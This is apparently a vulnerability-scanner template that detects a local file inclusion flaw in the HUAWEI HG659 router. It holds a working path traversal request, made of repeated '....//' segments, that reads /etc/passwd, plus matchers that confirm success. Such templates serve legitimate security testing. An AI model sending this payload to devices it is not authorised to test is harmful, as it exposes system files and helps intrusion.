id: huawei-hg659-lfi

info:
  name: HUAWEI HG659 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: HUAWEI HG659 is vulnerable to local file inclusion.
  reference:
    - https://twitter.com/sec715/status/1406782172443287559
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,huawei

requests:
  - method: GET
    path:
      - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
